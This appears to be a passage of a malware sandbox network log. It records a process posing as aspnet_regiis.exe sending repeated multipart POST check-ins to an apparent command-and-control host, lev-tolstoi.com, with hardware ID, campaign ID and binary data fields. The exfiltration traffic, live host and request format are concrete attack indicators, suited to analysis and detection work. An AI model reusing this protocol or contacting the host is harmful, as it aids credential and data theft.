Set-Cookie: PHPSESSID=49cvfcll8dokvk516o2dn378e8; expires=Wed, 23 Apr 2025 14:51:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRfxRio8UjRomMAeiDqkZhTib4KiMeTEKX33%2BsXnzFmZlvdyOXPEmgtPFEJYoBdQHviNNmXlXmddNeGH1XMgWXdKQVg0jwGdPWzJAd250tDpNf4umDBWwsvjS2GGOd6riQE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f9481c5cc7f19b6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1968&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=985&delivery_rate=1444114&cwnd=170&unsent_bytes=0&cid=c9a697e0c70b1713&ts=781&x=0"
2024-12-28 21:05:10 UTC | 250 | IN | Data Raw: 32 64 38 61 0d 0a 43 75 34 51 4d 37 4b 68 79 58 54 6e 52 69 50 61 4a 6b 46 4e 58 7a 78 71 56 72 48 76 4a 63 50 6b 70 64 31 46 4d 42 4f 75 35 2b 42 78 7a 47 59 52 69 4a 58 6c 56 70 51 6a 41 65 42 41 49 43 45 73 57 55 5a 30 30 49 73 48 2b 59 4c 45 73 54 5a 56 50 34 79 52 6a 53 6a 55 64 6c 4c 65 30 71 78 59 78 53 4e 62 2b 42 77 61 4e 6e 31 5a 42 48 53 4c 7a 55 43 70 68 73 53 78 4a 31 46 34 77 5a 65 4d 61 59 5a 38 56 4e 72 45 71 68 43 47 4b 6b 36 2f 51 79 51 73 4e 56 49 44 4f 39 6d 43 42 2b 2f 47 77 4b 64 6e 43 6a 48 6a 67 70 52 72 6f 33 46 41 32 59 4f 30 57 4a 78 6b 52 72 51 45 65 32 38 2b 57 51 67 36 31 34 74 4f 71 34 7a 4e 75 53 5a 55 65 64 36 4f 68 6d 4b 47 63 6c 66 62 7a 71 4d 45 69 79 42 4a 74 45 55 75 4c 48 30 51 53 44 50 4c 7a 52 2f 68
Data Ascii: 2d8aCu4QM7KhyXTnRiPaJkFNXzxqVrHvJcPkpd1FMBOu5+BxzGYRiJXlVpQjAeBAICEsWUZ00IsH+YLEsTZVP4yRjSjUdlLe0qxYxSNb+BwaNn1ZBHSLzUCphsSxJ1F4wZeMaYZ8VNrEqhCGKk6/QyQsNVIDO9mCB+/GwKdnCjHjgpRro3FA2YO0WJxkRrQEe28+WQg614tOq4zNuSZUed6OhmKGclfbzqMEiyBJtEUuLH0QSDPLzR/h
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 31 66 57 38 4e 6b 4e 6b 77 5a 57 45 4b 4a 4d 38 53 4a 44 45 70 31 62 64 5a 45 6d 30 53 69 59 73 4d 6c 6b 4a 4e 4d 47 43 52 36 4b 4f 7a 37 73 74 58 58 37 44 69 34 68 76 68 48 74 57 33 38 53 6a 45 49 6f 6e 41 66 59 45 4a 44 64 39 42 6b 67 55 77 34 35 45 74 59 76 57 2f 7a 67 63 61 49 79 43 6a 69 6a 55 4d 6c 66 65 77 71 59 57 6c 79 78 4b 73 30 45 78 4a 44 52 54 42 54 54 65 68 30 69 69 68 73 43 31 4c 56 31 37 79 49 69 50 62 6f 78 79 45 5a 36 44 72 41 37 46 66 41 47 62 51 54 4d 6f 4d 55 68 4b 44 70 4f 53 43 62 6a 47 77 4c 4e 6e 43 6a 48 45 67 49 46 72 68 33 31 53 32 4d 69 35 46 70 63 69 54 4c 31 57 4a 53 6f 7a 56 41 73 6d 32 59 4e 42 6f 6f 2f 4d 74 69 4a 56 64 59 7a 4c 77 6d 2b 55 4d 67 6d 51 34 71 59 64 69 53 35 57 75 41 51 38 59 53 51 65 44 7a 69 54 31 51 65
Data Ascii: 1fW8NkNkwZWEKJM8SJDEp1bdZEm0SiYsMlkJNMGCR6KOz7stXX7Di4hvhHtW38SjEIonAfYEJDd9BkgUw45EtYvW/zgcaIyCjijUMlfewqYWlyxKs0ExJDRTBTTeh0iihsC1LV17yIiPboxyEZ6DrA7FfAGbQTMoMUhKDpOSCbjGwLNnCjHEgIFrh31S2Mi5FpciTL1WJSozVAsm2YNBoo/MtiJVdYzLwm+UMgmQ4qYdiS5WuAQ8YSQeDziT1Qe
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 32 6b 53 64 74 54 46 32 69 69 39 5a 56 71 53 39 71 67 59 69 79 4e 58 2b 46 74 74 4e 6e 31 5a 42 48 53 4c 7a 55 71 70 67 38 4b 77 4a 6c 68 2f 79 59 2b 4f 59 49 4a 78 51 39 2f 48 71 78 71 4e 4c 6b 79 32 51 43 73 6d 4e 6c 55 4f 4e 4e 4b 48 42 2b 2f 47 77 4b 64 6e 43 6a 48 34 67 6f 35 6c 67 7a 42 6b 30 38 32 6c 45 5a 4e 6b 58 76 5a 64 59 79 67 78 48 6c 42 30 33 34 52 48 71 6f 7a 44 76 79 42 66 64 4d 2b 43 67 57 57 4c 65 46 2f 58 78 36 63 66 69 43 4a 42 76 30 41 6d 50 54 68 58 42 44 69 54 77 77 65 6d 6e 6f 66 6e 5a 33 31 32 32 6f 61 74 61 35 31 37 45 63 2b 4e 73 6c 61 43 4b 41 48 67 42 43 51 71 4e 56 55 4f 50 4e 4f 66 51 71 2b 4e 78 72 55 68 55 33 7a 41 67 34 4a 70 6a 48 52 64 30 4d 53 73 42 4a 63 68 52 36 70 4f 59 32 46 39 57 52 42 30 69 38 31 78 73 5a 48 57
Data Ascii: 2kSdtTF2ii9ZVqS9qgYiyNX+FttNn1ZBHSLzUqpg8KwJlh/yY+OYIJxQ9/HqxqNLky2QCsmNlUONNKHB+/GwKdnCjH4go5lgzBk082lEZNkXvZdYygxHlB034RHqozDvyBfdM+CgWWLeF/Xx6cfiCJBv0AmPThXBDiTwwemnofnZ3122oata517Ec+NslaCKAHgBCQqNVUOPNOfQq+NxrUhU3zAg4JpjHRd0MSsBJchR6pOY2F9WRB0i81xsZHW
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 6a 44 6a 59 70 6e 67 33 5a 66 31 73 57 6d 45 34 6f 75 55 37 42 4b 4c 69 51 79 56 52 6f 30 33 6f 6c 4c 70 59 37 4d 74 57 63 63 4d 63 75 64 77 6a 44 4d 52 31 7a 66 77 36 67 41 78 54 73 50 6f 51 51 6b 49 33 30 47 53 44 6a 64 6a 55 69 74 69 73 79 33 4a 6c 35 2f 79 34 43 4c 59 49 52 67 55 4e 54 4c 71 68 69 4b 4a 55 57 39 51 53 63 6f 4f 56 67 48 64 4a 33 4e 51 4c 6e 47 6e 2f 38 49 64 55 53 4f 70 4c 67 6f 6b 7a 78 49 6b 4d 53 6e 56 74 31 6b 54 62 74 49 4b 79 41 37 56 77 51 2b 32 6f 5a 4c 71 6f 4c 4c 74 69 4a 55 63 4d 6d 41 67 32 79 41 65 46 66 54 77 4b 51 5a 69 69 77 42 39 67 51 6b 4e 33 30 47 53 42 48 45 68 6b 6d 6e 78 74 6a 78 50 68 4a 32 77 4d 58 61 4b 49 42 37 56 39 62 47 70 78 65 44 4c 45 53 77 51 43 49 70 4f 31 30 48 4d 4e 61 4d 53 4b 57 4b 79 62 55 6d 55
Data Ascii: jDjYpng3Zf1sWmE4ouU7BKLiQyVRo03olLpY7MtWccMcudwjDMR1zfw6gAxTsPoQQkI30GSDjdjUitisy3Jl5/y4CLYIRgUNTLqhiKJUW9QScoOVgHdJ3NQLnGn/8IdUSOpLgokzxIkMSnVt1kTbtIKyA7VwQ+2oZLqoLLtiJUcMmAg2yAeFfTwKQZiiwB9gQkN30GSBHEhkmnxtjxPhJ2wMXaKIB7V9bGpxeDLESwQCIpO10HMNaMSKWKybUmU
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 51 62 34 4e 32 56 74 7a 46 70 42 43 45 49 55 75 30 51 79 59 6b 4d 6c 4a 49 65 70 4f 4b 58 2b 48 65 68 35 45 73 51 57 62 50 69 34 6c 2b 6c 7a 4a 4f 6e 74 72 72 45 59 6c 6b 47 66 68 48 4b 43 51 35 58 67 51 30 31 34 42 48 73 34 6e 41 75 43 35 5a 59 38 61 43 68 57 4f 45 65 56 37 57 30 61 63 59 6c 79 46 54 71 67 52 74 62 7a 70 47 53 47 79 54 75 30 43 78 6c 73 54 39 46 6b 52 79 32 6f 36 50 5a 4d 78 74 48 38 6d 44 72 42 72 46 66 41 47 2b 53 79 6f 73 4d 6c 38 42 4f 4e 36 49 54 71 53 48 77 62 73 74 57 48 48 4b 67 34 4e 74 68 6e 46 51 32 73 71 73 48 6f 49 6e 55 2f 67 4b 59 79 67 6c 48 6c 42 30 2b 6f 70 56 72 35 61 48 6f 47 6c 4c 4d 63 75 4a 77 6a 44 4d 64 6c 76 66 78 36 77 61 67 79 46 48 74 55 55 73 4c 6a 31 52 44 44 2f 61 69 30 61 73 67 38 71 37 4e 56 68 36 77 34
Data Ascii: Qb4N2VtzFpBCEIUu0QyYkMlJIepOKX+Heh5EsQWbPi4l+lzJOntrrEYlkGfhHKCQ5XgQ014BHs4nAuC5ZY8aChWOEeV7W0acYlyFTqgRtbzpGSGyTu0CxlsT9FkRy2o6PZMxtH8mDrBrFfAG+SyosMl8BON6ITqSHwbstWHHKg4NthnFQ2sqsHoInU/gKYyglHlB0+opVr5aHoGlLMcuJwjDMdlvfx6wagyFHtUUsLj1RDD/ai0asg8q7NVh6w4
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 65 46 54 61 7a 71 67 5a 68 6a 5a 41 76 6c 59 6a 49 6a 64 4d 41 6a 2f 57 67 45 71 73 68 63 47 35 4c 46 35 6a 78 59 57 42 59 38 77 38 45 64 66 62 36 30 37 46 42 31 61 75 54 69 51 6a 4b 31 55 4a 4e 38 57 41 56 2b 48 49 68 36 34 67 51 7a 47 55 6b 35 4a 2f 69 32 30 66 79 59 4f 73 47 73 56 38 41 62 35 4e 4a 53 67 37 55 42 6f 78 31 59 4a 49 71 49 2f 44 74 79 52 53 64 63 69 43 68 32 75 41 65 56 62 54 7a 4b 38 66 69 79 31 4f 2b 41 70 6a 4b 43 55 65 55 48 54 79 6c 6b 53 74 69 34 65 67 61 55 73 78 79 34 6e 43 4d 4d 78 2b 58 39 58 44 6f 52 43 42 49 55 65 79 51 53 4d 6b 50 6c 45 4d 4d 74 65 43 52 36 71 50 78 72 6b 69 57 48 72 4b 69 49 46 75 69 6a 49 66 6b 4d 53 7a 56 74 31 6b 59 61 4e 4a 4c 79 68 39 51 55 59 74 6b 34 70 4c 34 64 36 48 74 43 74 57 64 73 79 49 67 57 43
Data Ascii: eFTazqgZhjZAvlYjIjdMAj/WgEqshcG5LF5jxYWBY8w8Edfb607FB1auTiQjK1UJN8WAV+HIh64gQzGUk5J/i20fyYOsGsV8Ab5NJSg7UBox1YJIqI/DtyRSdciCh2uAeVbTzK8fiy1O+ApjKCUeUHTylkSti4egaUsxy4nCMMx+X9XDoRCBIUeyQSMkPlEMMteCR6qPxrkiWHrKiIFuijIfkMSzVt1kYaNJLyh9QUYtk4pL4d6HtCtWdsyIgWC
2024-12-28 21:05:10 UTC | 1369 | IN | Data Raw: 39 4b 39 47 35 55 6a 41 59 63 4b 59 7a 64 39 42 6b 67 42 30 49 4e 4a 70 70 44 57 38 67 42 45 65 38 75 56 68 58 2b 44 4d 68 2b 51 78 65 74 4f 31 6d 6f 42 76 46 56 6a 64 32 30 4d 55 32 47 41 32 68 66 7a 6d 59 6d 6d 5a 30 51 78 6c 4e 66 4d 4b 4a 34 79 43 5a 43 45 71 41 53 58 49 6b 4b 75 52 32 51 52 41 33 6b 53 4f 64 57 61 56 70 2b 34 77 4b 55 71 56 47 62 64 79 5a 64 72 67 6e 78 57 78 6f 50 6c 56 6f 70 6b 47 59 45 45 61 32 38 43 45 45 67 73 6b 39 55 48 6c 49 58 4a 73 53 42 45 59 49 47 69 6d 47 57 4b 5a 55 43 51 6a 65 73 51 78 58 77 52 39 67 51 6e 50 6e 30 47 57 47 61 49 32 42 54 32 31 70 57 67 61 55 73 78 32 73 58 61 4f 73 49 79 51 35 43 62 36 31 47 47 4e 6c 4f 2b 52 7a 55 73 65 6d 41 32 47 74 53 4c 51 71 61 57 68 5a 45 73 52 6e 61 4d 79 38 4a 6e 7a 43 70 6f
Data Ascii: 9K9G5UjAYcKYzd9BkgB0INJppDW8gBEe8uVhX+DMh+QxetO1moBvFVjd20MU2GA2hfzmYmmZ0QxlNfMKJ4yCZCEqASXIkKuR2QRA3kSOdWaVp+4wKUqVGbdyZdrgnxWxoPlVopkGYEEa28CEEgsk9UHlIXJsSBEYIGimGWKZUCQjesQxXwR9gQnPn0GWGaI2BT21pWgaUsx2sXaOsIyQ5Cb61GGNlO+RzUsemA2GtSLQqaWhZEsRnaMy8JnzCpo
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 61 44 5a 42 6e 71 43 6d 4d 72 4c 42 35 51 5a 49 48 57 45 76 4c 52 6c 2b 30 34 48 47 69 4d 6b 38 49 77 33 6a 77 52 77 6f 50 7a 56 73 49 6e 55 36 70 43 49 44 6b 2b 47 54 59 4b 39 49 4e 41 6f 4a 44 58 71 43 67 64 58 2f 71 6b 76 46 61 5a 63 56 2f 65 78 4c 30 48 78 57 6f 42 74 77 52 37 46 6e 30 57 53 41 75 64 7a 56 2f 68 33 6f 65 4b 4a 46 78 2f 79 35 4f 54 4a 61 74 38 56 74 48 56 75 77 47 4b 61 32 2b 4f 5a 57 4e 68 66 56 68 49 62 49 48 44 42 36 57 58 68 2b 64 33 41 43 71 5a 31 74 55 34 33 6d 30 66 79 59 4f 39 56 74 31 32 44 2f 68 57 59 33 64 39 47 51 73 6d 77 59 74 45 74 34 57 41 67 52 6c 31 66 38 75 45 6c 48 69 42 66 6e 44 54 30 71 45 6f 75 7a 46 43 74 6b 6f 6b 4f 53 77 65 52 6e 54 63 7a 52 2b 59 78 6f 2f 2f 47 42 77 78 31 4d 58 61 4b 4c 6c 78 58 39 37 45 76
                                                                                                                                                                                                                                                                Data Ascii: aDZBnqCmMrLB5QZIHWEvLRl+04HGiMk8Iw3jwRwoPzVsInU6pCIDk+GTYK9INAoJDXqCgdX/qkvFaZcV/exL0HxWoBtwR7Fn0WSAudzV/h3oeKJFx/y5OTJat8VtHVuwGKa2+OZWNhfVhIbIHDB6WXh+d3ACqZ1tU43m0fyYO9Vt12D/hWY3d9GQsmwYtEt4WAgRl1f8uElHiBfnDT0qEouzFCtkokOSweRnTczR+Yxo//GBwx1MXaKLlxX97Ev
                                                                                                                                                                                                                                                                2024-12-28 21:05:10 UTC1369INData Raw: 52 76 33 6f 64 41 69 39 5a 47 44 65 52 6f 55 43 73 69 76 6d 42 45 45 4e 32 33 4d 65 6b 61 35 70 78 45 5a 36 44 73 31 62 64 5a 47 79 71 51 7a 4d 73 66 33 49 50 4f 64 2f 4e 57 4f 2b 66 68 36 6c 6e 43 69 4b 43 78 5a 41 6f 31 44 49 57 30 39 47 35 45 49 59 79 51 76 39 36 48 51 49 76 57 52 67 33 6b 62 78 4b 70 5a 44 53 76 44 64 56 54 2f 4b 6f 6b 47 2b 63 63 52 50 31 2b 65 6b 6e 6b 79 64 42 74 6b 4e 6a 59 58 31 47 53 47 79 54 6f 46 57 6d 6c 73 54 39 41 6d 67 7a 2f 5a 4f 42 61 49 4a 31 45 5a 36 44 70 31 62 64 5a 45 79 71 51 7a 4d 73 63 56 6b 53 4d 35 4f 53 43 62 6a 47 30 66 39 2f 41 54 2b 4d 6c 38 49 77 7a 44 56 66 33 63 4b 6f 47 49 59 32 55 37 35 48 4e 53 78 36 59 44 59 62 32 49 78 58 72 4a 66 4b 75 7a 46 73 54 2b 75 44 68 32 2b 79 54 47 62 42 78 4c 74 55 6f 79
                                                                                                                                                                                                                                                                Data Ascii: Rv3odAi9ZGDeRoUCsivmBEEN23Meka5pxEZ6Ds1bdZGyqQzMsf3IPOd/NWO+fh6lnCiKCxZAo1DIW09G5EIYyQv96HQIvWRg3kbxKpZDSvDdVT/KokG+ccRP1+eknkydBtkNjYX1GSGyToFWmlsT9Amgz/ZOBaIJ1EZ6Dp1bdZEyqQzMscVkSM5OSCbjG0f9/AT+Ml8IwzDVf3cKoGIY2U75HNSx6YDYb2IxXrJfKuzFsT+uDh2+yTGbBxLtUoy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 172.67.157.254 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:12 UTC | 276 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=M7Y72E3D69IRA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12812
    Host: lev-tolstoi.com
2024-12-28 21:05:12 UTC | 12812 | OUT | Data Raw: 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 37 59 37 32 45 33 44 36 39 49 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 4d 37 59 37
    Data Ascii: --M7Y72E3D69IRAContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--M7Y72E3D69IRAContent-Disposition: form-data; name="pid"2--M7Y72E3D69IRAContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--M7Y7
2024-12-28 21:05:13 UTC | 1122 | IN | HTTP/1.1 200 OK
    Date: Sat, 28 Dec 2024 21:05:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=671ec616gml386q3li3km57gdt; expires=Wed, 23 Apr 2025 14:51:51 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sjr6tS2RT7zUUyLtKHVuFexWuKLT0D1IZtBZMYsBIOhSproEVJOENA1nqWL72ptVlEVCeSilKZsRlilh3QukbLSPsjNd8q3OMXnUiMGqxVtumEOeEKNEk4H69ddMqWXalvA%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f9481d3f8854271-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1683&rtt_var=639&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13746&delivery_rate=1701631&cwnd=252&unsent_bytes=0&cid=9ae67fc8ac579b80&ts=1049&x=0"
2024-12-28 21:05:13 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-28 21:05:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 172.67.157.254 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:14 UTC | 271 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=J3FFDY4G
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15024
    Host: lev-tolstoi.com
2024-12-28 21:05:14 UTC | 15024 | OUT | Data Raw: 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 0d 0a 2d 2d 4a 33 46 46 44 59 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44
    Data Ascii: --J3FFDY4GContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--J3FFDY4GContent-Disposition: form-data; name="pid"2--J3FFDY4GContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6ab--J3FFDY4GContent-D
2024-12-28 21:05:15 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Sat, 28 Dec 2024 21:05:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=96qsjkrclavdv2bp19r20qljck; expires=Wed, 23 Apr 2025 14:51:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LWU6JwHgyD25t%2B5%2BXBgrAXuQ5sOz%2FXOQmxxM2l4Dvh2Cz11llsdTbgOfN0PUVXZtrbOJ0HH6Kpq1Ml2z5Zzg3nUHD9eIX8tYh9LnjskBHar9LvdGodNXnxoOHAa%2FccqoGFM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f9481e2e9957cf6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2029&rtt_var=768&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15953&delivery_rate=1418164&cwnd=193&unsent_bytes=0&cid=352385b2103bf621&ts=869&x=0"
2024-12-28 21:05:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-28 21:05:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 172.67.157.254 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:16 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3A6GNRTMT0ED2APJYU3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20580
    Host: lev-tolstoi.com
2024-12-28 21:05:16 UTC | 15331 | OUT | Data Raw: 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 41 36 47 4e 52 54 4d 54 30 45 44 32 41 50 4a 59 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64
    Data Ascii: --3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="pid"3--3A6GNRTMT0ED2APJYU3Content-Disposition: form-data; name="lid"HpOoIh--5d
2024-12-28 21:05:16 UTC | 5249 | OUT | Data Raw: f5 b1 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: fBZ>56vMMZh'F3Wun 4F([:7s~X`nO
2024-12-28 21:05:17 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:17 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=3nteptkoi1rod1id7e9n8hmtdm; expires=Wed, 23 Apr 2025 14:51:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2R6AM7SbSF1Hb7VcL2JRb7BOiqb9BN2J%2FYUasUvO7gHRalGcxHc4S9AainamSgVudMt35J3jShsm%2FW1bRuFAs%2BpX%2FwLMU0sCZhIuBNuX94Fixz5%2FbefrsSFtWD4au%2B5sxN4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
